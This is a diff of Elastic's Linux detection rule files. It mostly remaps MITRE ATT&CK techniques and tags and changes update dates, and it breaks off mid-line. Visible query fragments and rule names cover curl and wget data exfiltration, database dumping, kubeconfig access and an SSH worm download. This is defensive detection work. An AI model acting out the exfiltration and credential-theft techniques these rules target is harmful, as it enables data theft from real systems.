author = ["Elastic"] @@ -100,14 +100,20 @@ event.category:process and host.os.type:linux and auditd.data.syscall:mprotect a framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1106" -name = "Native API" -reference = "https://attack.mitre.org/techniques/T1106/" +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.004" +name = "Unix Shell" +reference = "https://attack.mitre.org/techniques/T1059/004/" [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" + [rule.new_terms] field = "new_terms_fields" value = ["process.name"] diff --git a/rules/linux/execution_unusual_kthreadd_execution.toml b/rules/linux/execution_unusual_kthreadd_execution.toml index 10ee7be4397..fb453b1a848 100644 --- a/rules/linux/execution_unusual_kthreadd_execution.toml +++ b/rules/linux/execution_unusual_kthreadd_execution.toml @@ -2,7 +2,7 @@ creation_date = "2025/04/30" integration = ["endpoint", "crowdstrike"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/10/17" [rule] author = ["Elastic"] @@ -81,7 +81,15 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "medium" -tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Tactic: Execution", "Data Source: Elastic Defend", "Resources: Investigation Guide", "Data Source: Crowdstrike"] +tags = [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Execution", + "Data Source: Elastic Defend", + "Resources: Investigation Guide", + "Data Source: Crowdstrike", +] timestamp_override = "event.ingested" type = "new_terms" query = ''' @@ -109,33 +117,21 @@ process.command_line:( [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1014" -name = "Rootkit" -reference = "https://attack.mitre.org/techniques/T1014/" + [rule.threat.tactic] + name = "Execution" + id = "TA0002" + reference = "https://attack.mitre.org/tactics/TA0002/" -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" + [[rule.threat.technique]] + id = "T1059" + name = "Command and Scripting Interpreter" + reference = "https://attack.mitre.org/techniques/T1059/" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1059" -name = "Command and Scripting Interpreter" -reference = "https://attack.mitre.org/techniques/T1059/" - -[[rule.threat.technique.subtechnique]] -id = "T1059.004" -name = "Unix Shell" -reference = "https://attack.mitre.org/techniques/T1059/004/" + [[rule.threat.technique.subtechnique]] + name = "Unix Shell" + id = "T1059.004" + reference = "https://attack.mitre.org/techniques/T1059/004/" -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" [rule.new_terms] field = "new_terms_fields" value = ["process.name", "host.id"] diff --git a/rules/linux/execution_unusual_path_invocation_from_command_line.toml b/rules/linux/execution_unusual_path_invocation_from_command_line.toml index f5547ab6045..7c4599b99b1 100644 --- a/rules/linux/execution_unusual_path_invocation_from_command_line.toml +++ b/rules/linux/execution_unusual_path_invocation_from_command_line.toml @@ -2,7 +2,7 @@ creation_date = "2023/06/14" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/19" [rule] author = ["Elastic"] @@ -45,7 +45,15 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "low" -tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Data Source: Elastic Defend", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Execution", + "Tactic: Defense Evasion", + "Data Source: Elastic Defend", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "new_terms" query = ''' @@ -105,19 +113,33 @@ In Linux environments, shell processes like bash or zsh execute commands, often framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1574" -name = "Hijack Execution Flow" -reference = "https://attack.mitre.org/techniques/T1574/" +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" [[rule.threat.technique.subtechnique]] -id = "T1574.007" -name = "Path Interception by PATH Environment Variable" -reference = "https://attack.mitre.org/techniques/T1574/007/" +id = "T1059.004" +name = "Unix Shell" +reference = "https://attack.mitre.org/techniques/T1059/004/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1564" +name = "Hide Artifacts" +reference = "https://attack.mitre.org/techniques/T1564/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + [rule.new_terms] field = "new_terms_fields" value = ["process.parent.name"] diff --git a/rules/linux/execution_unusual_pkexec_execution.toml b/rules/linux/execution_unusual_pkexec_execution.toml index a08462182ae..0b613bb5b67 100644 --- a/rules/linux/execution_unusual_pkexec_execution.toml +++ b/rules/linux/execution_unusual_pkexec_execution.toml @@ -2,7 +2,7 @@ creation_date = "2025/01/16" integration = ["endpoint", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/19" [rule] author = ["Elastic"] @@ -94,7 +94,17 @@ Auditbeat is a lightweight shipper that you can install on your servers to audit - For complete “Setup and Run Auditbeat” information refer to the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setting-up-and-running.html). """ severity = "high" -tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Privilege Escalation", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: SentinelOne", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Execution", + "Tactic: Persistence", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: SentinelOne", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "new_terms" query = ''' @@ -115,14 +125,28 @@ not ( framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1548" -name = "Abuse Elevation Control Mechanism" -reference = "https://attack.mitre.org/techniques/T1548/" +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" [rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1543" +name = "Create or Modify System Process" +reference = "https://attack.mitre.org/techniques/T1543/" + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" + [rule.new_terms] field = "new_terms_fields" value = ["process.parent.command_line"] diff --git a/rules/linux/exfiltration_potential_curl_data_exfiltration.toml b/rules/linux/exfiltration_potential_curl_data_exfiltration.toml index eba84332571..d26ede83d7b 100644 --- a/rules/linux/exfiltration_potential_curl_data_exfiltration.toml +++ b/rules/linux/exfiltration_potential_curl_data_exfiltration.toml @@ -2,7 +2,7 @@ creation_date = "2025/04/29" integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/03/13" [rule] author = ["Elastic"] @@ -113,17 +113,12 @@ process.name == "curl" and ?process.parent.executable != null and [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1048" -name = "Exfiltration Over Alternative Protocol" -reference = "https://attack.mitre.org/techniques/T1048/" + [rule.threat.tactic] + name = "Exfiltration" + id = "TA0010" + reference = "https://attack.mitre.org/tactics/TA0010/" -[[rule.threat.technique]] -id = "T1567" -name = "Exfiltration Over Web Service" -reference = "https://attack.mitre.org/techniques/T1567/" - -[rule.threat.tactic] -id = "TA0010" -name = "Exfiltration" -reference = "https://attack.mitre.org/tactics/TA0010/" + [[rule.threat.technique]] + name = "Exfiltration Over Alternative Protocol" + id = "T1048" + reference = "https://attack.mitre.org/techniques/T1048/" diff --git a/rules/linux/exfiltration_potential_data_splitting_for_exfiltration.toml b/rules/linux/exfiltration_potential_data_splitting_for_exfiltration.toml index 6f2664a7726..89aa348f4dd 100644 --- a/rules/linux/exfiltration_potential_data_splitting_for_exfiltration.toml +++ b/rules/linux/exfiltration_potential_data_splitting_for_exfiltration.toml @@ -2,7 +2,7 @@ creation_date = "2024/11/04" integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/19" [rule] author = ["Elastic"] @@ -124,11 +124,6 @@ process where host.os.type == "linux" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1030" -name = "Data Transfer Size Limits" -reference = "https://attack.mitre.org/techniques/T1030/" - [rule.threat.tactic] id = "TA0010" name = "Exfiltration" diff --git a/rules/linux/exfiltration_potential_database_dumping.toml b/rules/linux/exfiltration_potential_database_dumping.toml index 993bc7a55aa..6f00692824d 100644 --- a/rules/linux/exfiltration_potential_database_dumping.toml +++ b/rules/linux/exfiltration_potential_database_dumping.toml @@ -2,7 +2,7 @@ creation_date = "2026/03/13" integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/03/24" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -86,7 +86,7 @@ tags = [ "Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", - "Tactic: Collection", + "Tactic: Exfiltration", "Data Source: Elastic Defend", "Data Source: Crowdstrike", "Data Source: SentinelOne", @@ -104,12 +104,12 @@ process.name in ("pg_dump", "pg_dumpall", "mysqldump", "mariadb-dump", "mongodum [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1213" -name = "Data from Information Repositories" -reference = "https://attack.mitre.org/techniques/T1213/" + [rule.threat.tactic] + name = "Exfiltration" + id = "TA0010" + reference = "https://attack.mitre.org/tactics/TA0010/" -[rule.threat.tactic] -id = "TA0009" -name = "Collection" -reference = "https://attack.mitre.org/tactics/TA0009/" + [[rule.threat.technique]] + name = "Exfiltration Over Alternative Protocol" + id = "T1048" + reference = "https://attack.mitre.org/techniques/T1048/" diff --git a/rules/linux/exfiltration_potential_wget_data_exfiltration.toml b/rules/linux/exfiltration_potential_wget_data_exfiltration.toml index d978c2aee6c..e0f16b19169 100644 --- a/rules/linux/exfiltration_potential_wget_data_exfiltration.toml +++ b/rules/linux/exfiltration_potential_wget_data_exfiltration.toml @@ -2,7 +2,7 @@ creation_date = "2026/01/07" integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel", "auditd_manager"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/03/13" [rule] author = ["Elastic"] @@ -122,12 +122,12 @@ process.name == "wget" and ?process.parent.executable != null and ( [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1567" -name = "Exfiltration Over Web Service" -reference = "https://attack.mitre.org/techniques/T1567/" + [rule.threat.tactic] + name = "Exfiltration" + id = "TA0010" + reference = "https://attack.mitre.org/tactics/TA0010/" -[rule.threat.tactic] -id = "TA0010" -name = "Exfiltration" -reference = "https://attack.mitre.org/tactics/TA0010/" + [[rule.threat.technique]] + name = "Exfiltration Over Alternative Protocol" + id = "T1048" + reference = "https://attack.mitre.org/techniques/T1048/" diff --git a/rules/linux/exfiltration_unusual_file_transfer_utility_launched.toml b/rules/linux/exfiltration_unusual_file_transfer_utility_launched.toml index 1e50445591e..f6d821c4711 100644 --- a/rules/linux/exfiltration_unusual_file_transfer_utility_launched.toml +++ b/rules/linux/exfiltration_unusual_file_transfer_utility_launched.toml @@ -2,7 +2,7 @@ creation_date = "2025/02/21" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/01/16" [rule] author = ["Elastic"] @@ -80,7 +80,15 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "medium" -tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Exfiltration", "Data Source: Elastic Defend", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Exfiltration", + "Tactic: Execution", + "Data Source: Elastic Defend", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "esql" query = ''' @@ -163,12 +171,15 @@ from logs-endpoint.events.process-* metadata _id, _index, _version [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1048" -name = "Exfiltration Over Alternative Protocol" -reference = "https://attack.mitre.org/techniques/T1048/" - [rule.threat.tactic] id = "TA0010" name = "Exfiltration" reference = "https://attack.mitre.org/tactics/TA0010/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules/linux/impact_memory_swap_modification.toml b/rules/linux/impact_memory_swap_modification.toml index f6ef7c656b6..2336a398314 100644 --- a/rules/linux/impact_memory_swap_modification.toml +++ b/rules/linux/impact_memory_swap_modification.toml @@ -2,7 +2,7 @@ creation_date = "2024/11/04" integration = ["endpoint", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/19" [rule] author = ["Elastic"] @@ -81,7 +81,18 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "medium" -tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Impact", "Data Source: Elastic Defend", "Data Source: SentinelOne", "Data Source: Elastic Endgame", "Resources: Investigation Guide", "Data Source: Crowdstrike"] +tags = [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Impact", + "Tactic: Execution", + "Data Source: Elastic Defend", + "Data Source: SentinelOne", + "Data Source: Elastic Endgame", + "Resources: Investigation Guide", + "Data Source: Crowdstrike", +] timestamp_override = "event.ingested" type = "eql" query = ''' @@ -114,3 +125,21 @@ reference = "https://attack.mitre.org/techniques/T1496/" id = "TA0040" name = "Impact" reference = "https://attack.mitre.org/tactics/TA0040/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.004" +name = "Unix Shell" +reference = "https://attack.mitre.org/techniques/T1059/004/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules/linux/impact_potential_bruteforce_malware_infection.toml b/rules/linux/impact_potential_bruteforce_malware_infection.toml index 6f8a2777a56..93c5361d32a 100644 --- a/rules/linux/impact_potential_bruteforce_malware_infection.toml +++ b/rules/linux/impact_potential_bruteforce_malware_infection.toml @@ -2,7 +2,7 @@ creation_date = "2025/02/20" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/01/16" [rule] author = ["Elastic"] @@ -83,7 +83,16 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "medium" -tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Credential Access", "Data Source: Elastic Defend", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Impact", + "Tactic: Execution", + "Tactic: Command and Control", + "Data Source: Elastic Defend", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "esql" query = ''' @@ -157,11 +166,42 @@ from logs-endpoint.events.network-* metadata _id, _index, _version framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1110" -name = "Brute Force" -reference = "https://attack.mitre.org/techniques/T1110/" +id = "T1496" +name = "Resource Hijacking" +reference = "https://attack.mitre.org/techniques/T1496/" [rule.threat.tactic] -id = "TA0006" -name = "Credential Access" -reference = "https://attack.mitre.org/tactics/TA0006/" +id = "TA0040" +name = "Impact" +reference = "https://attack.mitre.org/tactics/TA0040/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.004" +name = "Unix Shell" +reference = "https://attack.mitre.org/techniques/T1059/004/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1071" +name = "Application Layer Protocol" +reference = "https://attack.mitre.org/techniques/T1071/" + +[rule.threat.tactic] +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" diff --git a/rules/linux/initial_access_first_time_public_key_authentication.toml b/rules/linux/initial_access_first_time_public_key_authentication.toml index 9bc8e27141c..1e74cf2cb47 100644 --- a/rules/linux/initial_access_first_time_public_key_authentication.toml +++ b/rules/linux/initial_access_first_time_public_key_authentication.toml @@ -2,7 +2,7 @@ creation_date = "2025/02/21" integration = ["system"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/19" [rule] author = ["Elastic"] @@ -82,7 +82,14 @@ Filebeat is a lightweight shipper for forwarding and centralizing log data. Inst - To run the system module of Filebeat on Linux follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-module-system.html). """ severity = "low" -tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Initial Access", "Tactic: Lateral Movement", "Data Source: Elastic Defend", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Initial Access", + "Data Source: Elastic Defend", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "new_terms" query = ''' @@ -92,33 +99,16 @@ event.category:authentication and host.os.type:linux and event.action:ssh_login [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1078" -name = "Valid Accounts" -reference = "https://attack.mitre.org/techniques/T1078/" - [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" -[[rule.threat]] -framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1021" -name = "Remote Services" -reference = "https://attack.mitre.org/techniques/T1021/" - -[[rule.threat.technique.subtechnique]] -id = "T1021.004" -name = "SSH" -reference = "https://attack.mitre.org/techniques/T1021/004/" +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" -[rule.threat.tactic] -id = "TA0008" -name = "Lateral Movement" -reference = "https://attack.mitre.org/tactics/TA0008/" [rule.new_terms] field = "new_terms_fields" value = ["system.auth.ssh.signature"] diff --git a/rules/linux/initial_access_successful_ssh_authentication_by_unusual_ip.toml b/rules/linux/initial_access_successful_ssh_authentication_by_unusual_ip.toml index 75bb96d09b0..d1e0215d442 100644 --- a/rules/linux/initial_access_successful_ssh_authentication_by_unusual_ip.toml +++ b/rules/linux/initial_access_successful_ssh_authentication_by_unusual_ip.toml @@ -2,7 +2,7 @@ creation_date = "2025/02/21" integration = ["system"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/19" [rule] author = ["Elastic"] @@ -75,7 +75,14 @@ Filebeat is a lightweight shipper for forwarding and centralizing log data. Inst - To run the system module of Filebeat on Linux follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-module-system.html). """ severity = "low" -tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Initial Access", "Tactic: Lateral Movement", "Data Source: Elastic Defend", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Initial Access", + "Data Source: Elastic Defend", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "new_terms" query = ''' @@ -85,33 +92,16 @@ event.category:authentication and host.os.type:linux and event.action:ssh_login [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1078" -name = "Valid Accounts" -reference = "https://attack.mitre.org/techniques/T1078/" - [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" -[[rule.threat]] -framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1021" -name = "Remote Services" -reference = "https://attack.mitre.org/techniques/T1021/" - -[[rule.threat.technique.subtechnique]] -id = "T1021.004" -name = "SSH" -reference = "https://attack.mitre.org/techniques/T1021/004/" +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" -[rule.threat.tactic] -id = "TA0008" -name = "Lateral Movement" -reference = "https://attack.mitre.org/tactics/TA0008/" [rule.new_terms] field = "new_terms_fields" value = ["related.ip"] diff --git a/rules/linux/initial_access_successful_ssh_authentication_by_unusual_user.toml b/rules/linux/initial_access_successful_ssh_authentication_by_unusual_user.toml index 6abae46e1a9..ffc5417fe60 100644 --- a/rules/linux/initial_access_successful_ssh_authentication_by_unusual_user.toml +++ b/rules/linux/initial_access_successful_ssh_authentication_by_unusual_user.toml @@ -2,7 +2,7 @@ creation_date = "2025/02/21" integration = ["system"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/19" [rule] author = ["Elastic"] @@ -59,7 +59,14 @@ SSH (Secure Shell) is a protocol used to securely access and manage Linux system risk_score = 21 rule_id = "5b8d7b94-23c6-4e3f-baed-3a4d0da4f19d" severity = "low" -tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Initial Access", "Tactic: Lateral Movement", "Data Source: Elastic Defend", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Initial Access", + "Data Source: Elastic Defend", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "new_terms" query = ''' @@ -69,33 +76,16 @@ event.category:authentication and host.os.type:linux and event.action:ssh_login [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1078" -name = "Valid Accounts" -reference = "https://attack.mitre.org/techniques/T1078/" - [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" -[[rule.threat]] -framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1021" -name = "Remote Services" -reference = "https://attack.mitre.org/techniques/T1021/" - -[[rule.threat.technique.subtechnique]] -id = "T1021.004" -name = "SSH" -reference = "https://attack.mitre.org/techniques/T1021/004/" +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" -[rule.threat.tactic] -id = "TA0008" -name = "Lateral Movement" -reference = "https://attack.mitre.org/tactics/TA0008/" [rule.new_terms] field = "new_terms_fields" value = ["related.user"] diff --git a/rules/linux/initial_access_telnet_auth_bypass_via_user_envar.toml b/rules/linux/initial_access_telnet_auth_bypass_via_user_envar.toml index 56abd0cda0b..159ac1545b7 100644 --- a/rules/linux/initial_access_telnet_auth_bypass_via_user_envar.toml +++ b/rules/linux/initial_access_telnet_auth_bypass_via_user_envar.toml @@ -2,7 +2,7 @@ creation_date = "2026/01/24" integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/02/24" [rule] author = ["Elastic"] @@ -76,7 +76,19 @@ references = [ risk_score = 99 rule_id = "ab7795cc-0e0b-4f9d-a934-1f17a58f869a" severity = "critical" -tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Initial Access", "Resources: Investigation Guide", "Use Case: Vulnerability", "Data Source: Elastic Defend", "Data Source: Elastic Endgame", "Data Source: Crowdstrike", "Data Source: SentinelOne"] +tags = [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Initial Access", + "Tactic: Lateral Movement", + "Resources: Investigation Guide", + "Use Case: Vulnerability", + "Data Source: Elastic Defend", + "Data Source: Elastic Endgame", + "Data Source: Crowdstrike", + "Data Source: SentinelOne" +] timestamp_override = "event.ingested" type = "eql" @@ -89,13 +101,26 @@ process where host.os.type == "linux" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1190" name = "Exploit Public-Facing Application" reference = "https://attack.mitre.org/techniques/T1190/" + [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1210" +name = "Exploitation of Remote Services" +reference = "https://attack.mitre.org/techniques/T1210/" + + +[rule.threat.tactic] +id = "TA0008" +name = "Lateral Movement" +reference = "https://attack.mitre.org/tactics/TA0008/" + diff --git a/rules/linux/lateral_movement_kubeconfig_file_activity.toml b/rules/linux/lateral_movement_kubeconfig_file_activity.toml index 7f53f2f17ee..742506ac792 100644 --- a/rules/linux/lateral_movement_kubeconfig_file_activity.toml +++ b/rules/linux/lateral_movement_kubeconfig_file_activity.toml @@ -4,7 +4,7 @@ integration = ["endpoint", "cloud_defend"] maturity = "production" min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0" min_stack_version = "9.3.0" -updated_date = "2026/03/23" +updated_date = "2026/02/05" [rule] author = ["Elastic"] @@ -87,7 +87,19 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "medium" -tags = ["Domain: Endpoint", "Domain: Container", "Domain: Kubernetes", "OS: Linux", "Use Case: Threat Detection", "Tactic: Credential Access", "Data Source: Elastic Defend", "Data Source: Elastic Defend for Containers", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "Domain: Container", + "Domain: Kubernetes", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Lateral Movement", + "Tactic: Defense Evasion", + "Tactic: Initial Access", + "Data Source: Elastic Defend", + "Data Source: Elastic Defend for Containers", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" query = ''' @@ -114,16 +126,37 @@ file where host.os.type == "linux" and event.type != "deletion" and file.path li framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1552" -name = "Unsecured Credentials" -reference = "https://attack.mitre.org/techniques/T1552/" +id = "T1550" +name = "Use Alternate Authentication Material" +reference = "https://attack.mitre.org/techniques/T1550/" -[[rule.threat.technique.subtechnique]] -id = "T1552.001" -name = "Credentials In Files" -reference = "https://attack.mitre.org/techniques/T1552/001/" +[rule.threat.tactic] +id = "TA0008" +name = "Lateral Movement" +reference = "https://attack.mitre.org/tactics/TA0008/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1550" +name = "Use Alternate Authentication Material" +reference = "https://attack.mitre.org/techniques/T1550/" [rule.threat.tactic] -id = "TA0006" -name = "Credential Access" -reference = "https://attack.mitre.org/tactics/TA0006/" +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[rule.threat.tactic] +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" + +[[rule.threat.technique]] +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" diff --git a/rules/linux/lateral_movement_ssh_it_worm_download.toml b/rules/linux/lateral_movement_ssh_it_worm_download.toml index a7ae98d712e..d7738588cf4 100644 --- a/rules/linux/lateral_movement_ssh_it_worm_download.toml +++ b/rules/linux/lateral_movement_ssh_it_worm_download.toml @@ -2,7 +2,7 @@ creation_date = "2023/09/21" integration = ["endpoint", "auditd_manager", "crowdstrike", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/19" [rule] author = ["Elastic"] @@ -86,7 +86,18 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "high" -tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Command and Control", "Data Source: Elastic Defend", "Data Source: Elastic Endgame", "Data Source: Auditd Manager", "Data Source: Crowdstrike", "Data Source: SentinelOne", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Lateral Movement", + "Data Source: Elastic Defend", + "Data Source: Elastic Endgame", + "Data Source: Auditd Manager", + "Data Source: Crowdstrike", + "Data Source: SentinelOne", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" query = ''' @@ -101,11 +112,26 @@ process where host.os.type == "linux" and event.type == "start" and framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1105" -name = "Ingress Tool Transfer" -reference = "https://attack.mitre.org/techniques/T1105/" +id = "T1021" +name = "Remote Services" +reference = "https://attack.mitre.org/techniques/T1021/" + +[[rule.threat.technique.subtechnique]] +id = "T1021.004" +name = "SSH" +reference = 